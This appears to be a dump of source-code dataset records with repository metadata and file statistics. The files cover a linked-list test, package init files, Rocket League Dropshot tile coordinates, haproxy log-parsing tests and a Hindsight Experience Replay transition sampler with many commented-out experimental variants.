self.assertEqual(linked_list.convert_to_list(), [1, 3])
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
linked_list.insert_at_head(1)
self.assertEqual(linked_list.convert_to_list(), [1, 2, 3])
n = linked_list.head
self.assertTrue(del_intermediate_node(n))
self.assertEqual(linked_list.convert_to_list(), [2, 3])
if __name__ == '__main__':
unittest.main()
| 35.258065
| 66
| 0.682983
| 290
| 2,186
| 4.768966
| 0.134483
| 0.245842
| 0.138829
| 0.156182
| 0.802603
| 0.761388
| 0.761388
| 0.733189
| 0.704266
| 0.644252
| 0
| 0.022016
| 0.21043
| 2,186
| 61
| 67
| 35.836066
| 0.779258
| 0.026075
| 0
| 0.75
| 0
| 0
| 0.003777
| 0
| 0
| 0
| 0
| 0
| 0.354167
| 1
| 0.020833
| false
| 0
| 0.0625
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
56829a15f0900b813742072c0108f7ebc58a24bc
| 88
|
py
|
Python
|
onmt/multiprocessing/__init__.py
|
esalesky/NMTGMinor
|
b6eafff21f5aabb874720e6df30cd6b91c339a7c
|
[
"MIT"
] | 5
|
2020-05-25T01:11:51.000Z
|
2021-02-18T08:55:43.000Z
|
onmt/multiprocessing/__init__.py
|
esalesky/NMTGMinor
|
b6eafff21f5aabb874720e6df30cd6b91c339a7c
|
[
"MIT"
] | 2
|
2021-09-14T03:18:12.000Z
|
2022-01-25T16:19:51.000Z
|
onmt/multiprocessing/__init__.py
|
esalesky/NMTGMinor
|
b6eafff21f5aabb874720e6df30cd6b91c339a7c
|
[
"MIT"
] | 1
|
2019-09-15T17:22:58.000Z
|
2019-09-15T17:22:58.000Z
|
import onmt.multiprocessing.nccl
import onmt.multiprocessing.multiprocessing_event_loop
| 29.333333
| 54
| 0.909091
| 10
| 88
| 7.8
| 0.6
| 0.25641
| 0.641026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 88
| 2
| 55
| 44
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8e61ca46fc6535192aee57d6709ffc9e282026bb
| 66
|
py
|
Python
|
fpgrowth_py/__init__.py
|
ablarry/fpgrowth_py
|
d7671ab87d885a5cbc79e6111a89620061351789
|
[
"MIT"
] | 51
|
2020-10-25T19:12:35.000Z
|
2022-02-22T01:40:25.000Z
|
fpgrowth_py/__init__.py
|
ablarry/fpgrowth_py
|
d7671ab87d885a5cbc79e6111a89620061351789
|
[
"MIT"
] | 4
|
2020-12-22T08:45:50.000Z
|
2021-09-12T08:53:27.000Z
|
fpgrowth_py/__init__.py
|
ablarry/fpgrowth_py
|
d7671ab87d885a5cbc79e6111a89620061351789
|
[
"MIT"
] | 20
|
2020-12-01T12:59:14.000Z
|
2022-03-23T13:26:55.000Z
|
from fpgrowth_py.fpgrowth import *
from fpgrowth_py.utils import *
| 33
| 34
| 0.833333
| 10
| 66
| 5.3
| 0.5
| 0.45283
| 0.528302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106061
| 66
| 2
| 35
| 33
| 0.898305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8ed0087f59bba1708d55020e336326c897c58410
| 5,721
|
py
|
Python
|
carball/analysis/constants/dropshot.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 119
|
2018-09-14T02:14:19.000Z
|
2022-03-06T05:06:54.000Z
|
carball/analysis/constants/dropshot.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 207
|
2018-09-06T18:53:06.000Z
|
2022-02-12T22:39:36.000Z
|
carball/analysis/constants/dropshot.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 44
|
2018-09-10T16:54:13.000Z
|
2022-02-19T03:07:50.000Z
|
from typing import Optional, Tuple, List
# taken from https://github.com/RLBot/RLBot/wiki/Dropshot
TILE_DIAMETER = 886.82
CORE_707_TILES_POSITIONS = (
# BLUE
(2304.0, -4117.4287109375, 2.5),
(1536.0, -4117.4287109375, 2.5),
(768.0, -4117.4287109375, 2.5),
(-0.0, -4117.4287109375, 2.5),
(-768.0, -4117.4287109375, 2.5),
(-1536.0, -4117.4287109375, 2.5),
(-2304.0, -4117.4287109375, 2.5),
(2688.0, -3452.322021484375, 2.5),
(1920.0, -3452.322021484375, 2.5),
(1152.0, -3452.322021484375, 2.5),
(384.0, -3452.322021484375, 2.5),
(-384.0, -3452.322021484375, 2.5),
(-1152.0, -3452.322021484375, 2.5),
(-1920.0, -3452.322021484375, 2.5),
(-2688.0, -3452.322021484375, 2.5),
(3072.0, -2788.428955078125, 2.5),
(2304.0, -2788.428955078125, 2.5),
(1536.0, -2788.428955078125, 2.5),
(768.0, -2788.428955078125, 2.5),
(-0.0, -2788.428955078125, 2.5),
(-768.0, -2788.428955078125, 2.5),
(-1536.0, -2788.428955078125, 2.5),
(-2304.0, -2788.428955078125, 2.5),
(-3072.0, -2788.428955078125, 2.5),
(3456.0, -2123.322021484375, 2.5),
(2688.0, -2123.322021484375, 2.5),
(1920.0, -2123.322021484375, 2.5),
(1152.0, -2123.322021484375, 2.5),
(384.0, -2123.322021484375, 2.5),
(-384.0, -2123.322021484375, 2.5),
(-1152.0, -2123.322021484375, 2.5),
(-1920.0, -2123.322021484375, 2.5),
(-2688.0, -2123.322021484375, 2.5),
(-3456.0, -2123.322021484375, 2.5),
(3840.0, -1458.21484375, 2.5),
(3072.0, -1458.21484375, 2.5),
(2304.0, -1458.21484375, 2.5),
(1536.0, -1458.21484375, 2.5),
(768.0, -1458.21484375, 2.5),
(-0.0, -1458.21484375, 2.5),
(-768.0, -1458.21484375, 2.5),
(-1536.0, -1458.21484375, 2.5),
(-2304.0, -1458.21484375, 2.5),
(-3072.0, -1458.21484375, 2.5),
(-3840.0, -1458.21484375, 2.5),
(4224.0, -793.1079711914062, 2.5),
(3456.0, -793.1079711914062, 2.5),
(2688.0, -793.1079711914062, 2.5),
(1920.0, -793.1079711914062, 2.5),
(1152.0, -793.1079711914062, 2.5),
(384.0, -793.1079711914062, 2.5),
(-384.0, -793.1079711914062, 2.5),
(-1152.0, -793.1079711914062, 2.5),
(-1920.0, -793.1079711914062, 2.5),
(-2688.0, -793.1079711914062, 2.5),
(-3456.0, -793.1079711914062, 2.5),
(-4224.0, -793.1079711914062, 2.5),
(4608.0, -127.99998474121094, 2.5),
(3840.0, -127.99998474121094, 2.5),
(3072.0, -127.99998474121094, 2.5),
(2304.0, -127.99998474121094, 2.5),
(1536.0, -127.99998474121094, 2.5),
(768.0, -127.99998474121094, 2.5),
(-0.0, -127.99998474121094, 2.5),
(-768.0, -127.99998474121094, 2.5),
(-1536.0, -127.99998474121094, 2.5),
(-2304.0, -128.0, 2.5),
(-3072.0, -127.99998474121094, 2.5),
(-3840.0, -127.99998474121094, 2.5),
(-4608.0, -127.99998474121094, 2.5),
# ORANGE
(4608.0, 128.0, 2.5),
(3840.0, 128.0, 2.5),
(3072.0, 128.0, 2.5),
(2304.0, 128.0, 2.5),
(1536.0, 128.0, 2.5),
(768.0, 128.0, 2.5),
(-0.0, 128.0, 2.5),
(-768.0, 128.0, 2.5),
(-1536.0, 128.0, 2.5),
(-2304.0, 128.0, 2.5),
(-3072.0, 128.0, 2.5),
(-3840.0, 128.0, 2.5),
(-4608.0, 128.0, 2.5),
(4224.0, 793.1079711914062, 2.5),
(3456.0, 793.1079711914062, 2.5),
(2688.0, 793.1079711914062, 2.5),
(1920.0, 793.1079711914062, 2.5),
(1152.0, 793.1079711914062, 2.5),
(384.0, 793.1079711914062, 2.5),
(-384.0, 793.1079711914062, 2.5),
(-1152.0, 793.1079711914062, 2.5),
(-1920.0, 793.1079711914062, 2.5),
(-2688.0, 793.1079711914062, 2.5),
(-3456.0, 793.1079711914062, 2.5),
(-4224.0, 793.1079711914062, 2.5),
(3840.0, 1458.21484375, 2.5),
(3072.0, 1458.21484375, 2.5),
(2304.0, 1458.21484375, 2.5),
(1536.0, 1458.21484375, 2.5),
(768.0, 1458.21484375, 2.5),
(-0.0, 1458.21484375, 2.5),
(-768.0, 1458.21484375, 2.5),
(-1536.0, 1458.21484375, 2.5),
(-2304.0, 1458.21484375, 2.5),
(-3072.0, 1458.21484375, 2.5),
(-3840.0, 1458.21484375, 2.5),
(3456.0, 2123.322021484375, 2.5),
(2688.0, 2123.322021484375, 2.5),
(1920.0, 2123.322021484375, 2.5),
(1152.0, 2123.322021484375, 2.5),
(384.0, 2123.322021484375, 2.5),
(-384.0, 2123.322021484375, 2.5),
(-1152.0, 2123.322021484375, 2.5),
(-1920.0, 2123.322021484375, 2.5),
(-2688.0, 2123.322021484375, 2.5),
(-3456.0, 2123.322021484375, 2.5),
(3072.0, 2788.428955078125, 2.5),
(2304.0, 2788.428955078125, 2.5),
(1536.0, 2788.428955078125, 2.5),
(768.0, 2788.428955078125, 2.5),
(-0.0, 2788.428955078125, 2.5),
(-768.0, 2788.428955078125, 2.5),
(-1536.0, 2788.428955078125, 2.5),
(-2304.0, 2788.428955078125, 2.5),
(-3072.0, 2788.428955078125, 2.5),
(2688.0, 3452.322021484375, 2.5),
(1920.0, 3452.322021484375, 2.5),
(1152.0, 3452.322021484375, 2.5),
(384.0, 3452.322021484375, 2.5),
(-384.0, 3452.322021484375, 2.5),
(-1152.0, 3452.322021484375, 2.5),
(-1920.0, 3452.322021484375, 2.5),
(-2688.0, 3452.322021484375, 2.5),
(2304.0, 4117.4287109375, 2.5),
(1536.0, 4117.4287109375, 2.5),
(768.0, 4117.4287109375, 2.5),
(-0.0, 4117.4287109375, 2.5),
(-768.0, 4117.4287109375, 2.5),
(-1536.0, 4117.4287109375, 2.5),
(-2304.0, 4117.4287109375, 2.5)
)
_MAPPING = {
'ShatterShot_P': CORE_707_TILES_POSITIONS
}
def get_tile_positions(map_name: str) -> Optional[Tuple[Tuple]]:
return _MAPPING.get(map_name, None)
def get_team_tiles(map_name: str, team: int) -> List[int] or None:
if map_name == 'ShatterShot_P':
if team == 0:
return list(range(70))
else:
return list(range(70, 140))
return None
| 33.852071
| 66
| 0.573152
| 921
| 5,721
| 3.539631
| 0.076004
| 0.08589
| 0.154601
| 0.132515
| 0.88773
| 0.88773
| 0.883742
| 0.882515
| 0.866564
| 0.866564
| 0
| 0.632595
| 0.194546
| 5,721
| 168
| 67
| 34.053571
| 0.07487
| 0.011711
| 0
| 0
| 0
| 0
| 0.004602
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012821
| false
| 0
| 0.00641
| 0.00641
| 0.044872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d96489b668cc30ed0c4974324fed7778390273e5
| 1,553
|
py
|
Python
|
tests/test_haproxy.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | null | null | null |
tests/test_haproxy.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | 2
|
2020-01-18T10:32:13.000Z
|
2020-01-18T10:34:17.000Z
|
tests/test_haproxy.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | null | null | null |
from korg import LineGrokker, PatternRepo
pr = PatternRepo()
def test_haproxy():
lg = LineGrokker('%{HAPROXYHTTP}', pr)
match = lg.grok('Dec 9 13:01:26 localhost haproxy[28029]: 127.0.0.1:39759 [09/Dec/2013:12:59:46.633] loadbalancer default/instance8 0/51536/1/48082/99627 200 83285 - - ---- 87/87/87/1/0 0/67 {77.24.148.74} "GET /path/to/image HTTP/1.1"')
assert match is not None
assert match["program"] == "haproxy"
assert match["client_ip"] == "127.0.0.1"
assert match["http_verb"] == "GET"
assert match["server_name"] == "instance8"
def test_haproxy_iso8601_timestamp():
lg = LineGrokker('%{HAPROXYHTTP}', pr)
match = lg.grok('2015-08-26T02:09:48+02:00 localhost haproxy[28029]: 127.0.0.1:39759 [09/Dec/2013:12:59:46.633] loadbalancer default/instance8 0/51536/1/48082/99627 200 83285 - - ---- 87/87/87/1/0 0/67 {77.24.148.74} "GET /path/to/image HTTP/1.1"')
assert match is not None
assert match["program"] == "haproxy"
assert match["client_ip"] == "127.0.0.1"
assert match["http_verb"] == "GET"
assert match["server_name"] == "instance8"
def test_haproxyhttpbase():
lg = LineGrokker('%{HAPROXYHTTPBASE}', pr)
match = lg.grok('127.0.0.1:39759 [09/Dec/2013:12:59:46.633] loadbalancer default/instance8 0/51536/1/48082/99627 200 83285 - - ---- 87/87/87/1/0 0/67 {77.24.148.74} "GET /path/to/image HTTP/1.1"')
assert match is not None
assert match["client_ip"] == "127.0.0.1"
assert match["http_verb"] == "GET"
assert match["server_name"] == "instance8"
| 41.972973
| 252
| 0.658081
| 254
| 1,553
| 3.968504
| 0.267717
| 0.152778
| 0.029762
| 0.035714
| 0.830357
| 0.830357
| 0.830357
| 0.756944
| 0.756944
| 0.756944
| 0
| 0.215103
| 0.155827
| 1,553
| 36
| 253
| 43.138889
| 0.553776
| 0
| 0
| 0.64
| 0
| 0.12
| 0.546684
| 0.10689
| 0
| 0
| 0
| 0
| 0.56
| 1
| 0.12
| false
| 0
| 0.04
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79a7db380cd793d775d8ec80c037549586a0af24
| 25,046
|
py
|
Python
|
baselines/her/her_sampler.py
|
ekwyss/baselines
|
3ee276fd3be5d330aaacaa3d478929ead4cb1d34
|
[
"MIT"
] | null | null | null |
baselines/her/her_sampler.py
|
ekwyss/baselines
|
3ee276fd3be5d330aaacaa3d478929ead4cb1d34
|
[
"MIT"
] | null | null | null |
baselines/her/her_sampler.py
|
ekwyss/baselines
|
3ee276fd3be5d330aaacaa3d478929ead4cb1d34
|
[
"MIT"
] | null | null | null |
import numpy as np
import pickle
# TODO: have both sampler run on every episode and compare
# also check place where it decides whether to update or not
def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
"""Creates a sample function that can be used for HER experience replay.
Args:
replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
regular DDPG experience replay is used
replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
as many HER replays as regular replays are used)
reward_fun (function): function to re-compute the reward with substituted goals
"""
if replay_strategy == 'future':
future_p = 1 - (1. / (1 + replay_k))
else: # 'replay_strategy' == 'none'
future_p = 0
def _sample_her_transitions(episode_batch, batch_size_in_transitions, ep_Ts):
# if batch_size_in_transitions != 49:
# pickle.dump(episode_batch, open("example_episode_3.pkl", "wb"))
# 10/0
# print(replay_k)
# print(batch_size_in_transitions)
"""episode_batch is {key: array(buffer_size x T x dim_key)}
"""
T = episode_batch['u'].shape[1]
rollout_batch_size = episode_batch['u'].shape[0]
batch_size = batch_size_in_transitions
# #limit on transition number we can sample from (has to correspond to relevant subgoal)
# ep_Ts = []
# ##Attempt for subgoal based sampling, not using for now
# # for i in range(rollout_batch_size):
# # goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# # cand_indices = [policy_index for policy_index in policy_indexes if policy_index <= len(goal_indices)]
# # if len(cand_indices) == 0:
# # ep_Ts.append(0)
# # continue
# # #specific to this bc only 3 subgoals total
# # if len(goal_indices) > 2:
# # goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# # else:
# # goal_indices = np.concatenate((goal_indices,[T]))
# # ep_Ts.append(goal_indices[cand_indices[-1]])
# # 3 policy
# for i in range(rollout_batch_size):
# goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# #if don't reach relevant subgoal, don't sample
# if policy_index > len(goal_indices):
# ep_Ts.append(0)
# continue
# #specific to this bc only 3 subgoals total, see if can get subgoal amount from anywhere
# if len(goal_indices) > 2:
# #subgoal indices coincide to first two subgoals reached + last timestep we are still in last subgoal
# #*but what if we reach last goal, stray out of zone, then return?
# goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# else:
# #otherwise we didn't reach the final goal, add goal_indices and total num of timesteps
# goal_indices = np.concatenate((goal_indices,[T]))
# #Cap transition number we can sample from for use with relevant subgoal policy
# ep_Ts.append(goal_indices[policy_index])
#1 policy
# for i in range(rollout_batch_size):
# ep_Ts.append(T)
num_candidate_transitions = sum(ep_Ts)
##PUT THIS IN POLICIES.PY TO SEE IF SHOULD TRAIN POLICY OR NOT, COMPUTATIONALLY REALLY INEFFICIENT, FIX
##done, but need to find more efficient way
# if num_candidate_transitions == 0:
# transitions = {key : np.array([]) for key in episode_batch.keys()}
# transitions['r'] = np.array([])
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# return transitions
# else:
#proba of picking transition from each episode for sampling, based on ratio of candidate transitions within episode to total num of candidate transitions
probas = [ep_T / num_candidate_transitions for ep_T in ep_Ts]
#episode of each sampled transition
episode_idxs = np.sort(np.random.choice(rollout_batch_size,batch_size,p=probas))
#List denoting how many transitions will be sampled from each corresponding episode according to index
t_per_ep = [np.sum(episode_idxs == i) for i in range(rollout_batch_size)]
# print("policy_index", policy_index)
# print("ep_Ts:", ep_Ts)
# print("num_cand_trans:", num_candidate_transitions)
# print(rollout_batch_size)
# print(batch_size)
# print("probas:", probas)
# print("ep_idxs:", episode_idxs)
# print("t_per_ep:", t_per_ep)
# TAKE t_per_ep SAMPLE FROM EVERY EP AND LINE UP WITH episode_idxs THEN SHUFFLE TOGETHER FOR USE IN CREATING TRANSITIONS
t_samples = []
future_offsets = []
# her_indexes = []
# future_t = []
# future_ag = []
#TODO: currently using "future" strategy, test against subgoal-based. Also see if explicitly enforcing "final" changes much
for i in range(rollout_batch_size):
#calculate relevant info for corresponding episode
t_samps = np.random.randint(ep_Ts[i],size=t_per_ep[i])
# her_inds = np.where(np.random.uniform(size=t_per_ep[i]) < future_p)[0]
future_offset = np.random.uniform(size=t_per_ep[i]) * (ep_Ts[i] - t_samps)
future_offset = future_offset.astype(int)
# her_ind = her_inds.astype(int)
# fut_t = (t_samps + 1 + future_offset)[her_inds]
# fut_ag = episode_batch['ag'][episode_idxs[her_inds], fut_t]
#TODO: does it matter if this is shuffled or not?
#shuffle all info together
# inds = np.arange(t_per_ep[i])
# np.random.shuffle(inds)
# t_samps = t_samps[inds]
# # her_inds = her_inds[inds[her_inds]]
# fut_t = fut_t[inds[her_inds]]
# fut_ag = fut_ag[inds[her_inds]]
#concat to output
if i == 0:
t_samples = t_samps.copy()
future_offsets = future_offset.copy()
# her_indexes = her_inds.copy()
# future_t = fut_t.copy()
# future_ag = fut_ag.copy()
else:
t_samples = np.concatenate((t_samples,t_samps))
future_offsets = np.concatenate((future_offsets,future_offset))
# her_indexes = np.concatenate((her_indexes, her_inds))
# future_t = np.concatenate((future_t, fut_t))
# future_ag = np.concatenate((future_ag,fut_ag))
her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
future_t = (t_samples + 1 + future_offsets)[her_indexes]
future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
for key in episode_batch.keys()}
transitions['g'][her_indexes] = future_ag
# Reconstruct info dictionary for reward computation.
info = {}
for key, value in transitions.items():
if key.startswith('info_'):
info[key.replace('info_', '')] = value
# Re-compute reward since we may have substituted the goal.
reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
reward_params['info'] = info
transitions['r'] = reward_fun(**reward_params)
transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
for k in transitions.keys()}
assert(transitions['u'].shape[0] == batch_size_in_transitions)
return transitions
return _sample_her_transitions
############# 2/27 w/o comments #################
# import numpy as np
# import pickle
# def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
# """Creates a sample function that can be used for HER experience replay.
# Args:
# replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
# regular DDPG experience replay is used
# replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
# as many HER replays as regular replays are used)
# reward_fun (function): function to re-compute the reward with substituted goals
# """
# if replay_strategy == 'future':
# future_p = 1 - (1. / (1 + replay_k))
# else: # 'replay_strategy' == 'none'
# future_p = 0
# def _sample_her_transitions(episode_batch, batch_size_in_transitions, ep_Ts):
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# num_candidate_transitions = sum(ep_Ts)
# probas = [ep_T / num_candidate_transitions for ep_T in ep_Ts]
# episode_idxs = np.sort(np.random.choice(rollout_batch_size,batch_size,p=probas))
# t_per_ep = [np.sum(episode_idxs == i) for i in range(rollout_batch_size)]
# # TAKE t_per_ep SAMPLE FROM EVERY EP AND LINE UP WITH episode_idxs THEN SHUFFLE TOGETHER FOR USE IN CREATING TRANSITIONS
# t_samples = []
# future_offsets = []
# for i in range(rollout_batch_size):
# #calculate relevant info for corresponding episode
# t_samps = np.random.randint(ep_Ts[i],size=t_per_ep[i])
# future_offset = np.random.uniform(size=t_per_ep[i]) * (ep_Ts[i] - t_samps)
# future_offset = future_offset.astype(int)
# #concat to output
# if i == 0:
# t_samples = t_samps.copy()
# future_offsets = future_offset.copy()
# else:
# t_samples = np.concatenate((t_samples,t_samps))
# future_offsets = np.concatenate((future_offsets,future_offset))
# her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
# future_t = (t_samples + 1 + future_offsets)[her_indexes]
# future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# return _sample_her_transitions
# ############### ORIGINAL #####################
# import numpy as np
# def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
# """Creates a sample function that can be used for HER experience replay.
# Args:
# replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
# regular DDPG experience replay is used
# replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
# as many HER replays as regular replays are used)
# reward_fun (function): function to re-compute the reward with substituted goals
# """
# if replay_strategy == 'future':
# future_p = 1 - (1. / (1 + replay_k))
# else: # 'replay_strategy' == 'none'
# future_p = 0
# def _sample_her_transitions(episode_batch, batch_size_in_transitions):
# """episode_batch is {key: array(buffer_size x T x dim_key)}
# """
# print(batch_size_in_transitions)
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# # Select which episodes and time steps to use.
# episode_idxs = np.random.randint(0, rollout_batch_size, batch_size)
# t_samples = np.random.randint(T, size=batch_size)
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# # Select future time indexes proportional with probability future_p. These
# # will be used for HER replay by substituting in future goals.
# her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
# future_offset = np.random.uniform(size=batch_size) * (T - t_samples)
# future_offset = future_offset.astype(int)
# future_t = (t_samples + 1 + future_offset)[her_indexes]
# # Replace goal with achieved goal but only for the previously-selected
# # HER transitions (as defined by her_indexes). For the other transitions,
# # keep the original goal.
# future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# return _sample_her_transitions
######################Testing###########################
# import numpy as np
# def _sample_her_transitions_orig(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index):
# """episode_batch is {key: array(buffer_size x T x dim_key)}
# """
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# np.random.seed(0)
# # Select which episodes and time steps to use.
# episode_idxs = np.random.randint(0, rollout_batch_size, batch_size)
# np.random.seed(0)
# np.random.seed(0)
# t_samples = np.random.randint(T, size=batch_size)
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# # Select future time indexes proportional with probability future_p. These
# # will be used for HER replay by substituting in future goals.
# np.random.seed(0)
# her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
# np.random.seed(0)
# future_offset = np.random.uniform(size=batch_size) * (T - t_samples)
# future_offset = future_offset.astype(int)
# future_t = (t_samples + 1 + future_offset)[her_indexes]
# # Replace goal with achieved goal but only for the previously-selected
# # HER transitions (as defined by her_indexes). For the other transitions,
# # keep the original goal.
# future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# def _sample_her_transitions_subgoal(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index):
# # if batch_size_in_transitions != 49:
# # pickle.dump(episode_batch, open("example_episode_3.pkl", "wb"))
# # 10/0
# # print(replay_k)
# # print(batch_size_in_transitions)
# """episode_batch is {key: array(buffer_size x T x dim_key)}
# """
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# #limit on transition number we can sample from (has to correspond to relevant subgoal)
# ep_Ts = []
# ##Attempt for subgoal based sampling, not using for now
# # for i in range(rollout_batch_size):
# # goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# # cand_indices = [policy_index for policy_index in policy_indexes if policy_index <= len(goal_indices)]
# # if len(cand_indices) == 0:
# # ep_Ts.append(0)
# # continue
# # #specific to this bc only 3 subgoals total
# # if len(goal_indices) > 2:
# # goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# # else:
# # goal_indices = np.concatenate((goal_indices,[T]))
# # ep_Ts.append(goal_indices[cand_indices[-1]])
# #3 policy
# # for i in range(rollout_batch_size):
# # goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# # #if don't reach relevant subgoal, don't sample
# # if policy_index > len(goal_indices):
# # ep_Ts.append(0)
# # continue
# # #specific to this bc only 3 subgoals total, see if can get subgoal amount from anywhere
# # if len(goal_indices) > 2:
# # #subgoal indices coincide to first two subgoals reached + last timestep we are still in last subgoal
# # #*but what if we reach last goal, stray out of zone, then return?
# # goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# # else:
# # #otherwise we didn't reach the final goal, add goal_indices and total num of timesteps
# # goal_indices = np.concatenate((goal_indices,[T]))
# # #Cap transition number we can sample from for use with relevant subgoal policy
# # ep_Ts.append(goal_indices[policy_index])
# #1 policy
# for i in range(rollout_batch_size):
# ep_Ts.append(49)
# num_candidate_transitions = sum(ep_Ts)
